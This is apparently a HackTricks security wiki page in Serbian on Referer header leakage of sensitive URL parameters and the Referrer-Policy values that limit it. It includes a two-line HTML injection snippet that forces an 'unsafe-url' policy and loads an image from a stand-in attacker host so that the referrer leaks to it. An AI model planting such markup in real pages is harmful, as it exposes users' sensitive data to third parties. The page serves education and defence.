Interesting HTTP

Učite i vežbajte hakovanje AWS-a: HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE) Učite i vežbajte hakovanje GCP-a: HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)

Podržite HackTricks

Proverite planove pretplate!
Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitteru 🐦 @hacktricks_live.
Podelite hakovanje trikova slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

Referrer zaglavlja i politika

Referrer je zaglavlje koje koriste pregledači da bi pokazali koja je prethodna posjećena stranica.

Procurene osetljive informacije

Ako se u nekom trenutku unutar web stranice nalaze osetljive informacije u GET zahtevu parametara, ako stranica sadrži linkove ka spoljnim izvorima ili napadač može da navede (socijalno inženjerstvo) korisnika da poseti URL koji kontroliše napadač. Mogao bi da eksfiltrira osetljive informacije unutar poslednjeg GET zahteva.

Otklanjanje

Možete naterati pregledač da prati Referrer-policy koji bi mogao izbeći slanje osetljivih informacija drugim web aplikacijama:

Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url

Protivmere

Možete poništiti ovaj pravilo korišćenjem HTML meta oznake (napadač mora da iskoristi HTML ubacivanje):

<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">

Odbrana

Nikada nemojte stavljati bilo kakve osetljive podatke unutar GET parametara ili putanja u URL-u.

PreviousOther Web Tricks NextAndroid Forensics

Last updated 4 months ago